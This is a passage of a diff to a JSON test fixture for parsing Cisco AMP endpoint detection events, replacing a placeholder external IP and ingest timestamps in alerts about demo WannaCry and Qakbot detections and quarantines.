"external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -185,7 +185,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -202,8 +202,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965487365Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388865700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":443000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204901661835278\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -225,7 +225,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -275,7 +275,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -292,8 +292,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965489493Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.388870400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":69000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419204901661835276\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -315,7 +315,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -365,7 +365,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -382,8 +382,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965491566Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", + "ingested": "2021-12-09T13:35:55.388875300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":6000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204897366867979\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -405,7 +405,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -446,7 +446,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -456,8 +456,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965493606Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388881100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204897366867971\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -477,7 +477,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -518,7 +518,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -528,8 +528,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965495672Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:55.388886800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411462918168117251\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -549,7 +549,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -594,7 +594,7 @@ "dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -604,8 +604,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965497735Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", + "ingested": "2021-12-09T13:35:55.388892500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462922463085000,\"timestamp\":1610629066,\"timestamp_nanoseconds\":103000000,\"date\":\"2021-01-14T12:57:46+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -625,7 +625,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -675,7 +675,7 @@ "75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -692,8 +692,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965499836Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", + "ingested": "2021-12-09T13:35:55.388898200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411462918168117000,\"timestamp\":1610629065,\"timestamp_nanoseconds\":573000000,\"date\":\"2021-01-14T12:57:45+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411462918168117252\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91\",\"sha1\":\"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12\",\"md5\":\"a97fb86da4e010974860e5024137b56b\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -715,7 +715,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -758,7 +758,7 @@ "0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -772,8 +772,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:43.965501904Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", + "ingested": "2021-12-09T13:35:55.388904Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":589000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}", "code": "553648147", "kind": "alert", "action": "Retrospective Detection", @@ -795,7 +795,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -838,7 +838,7 @@ 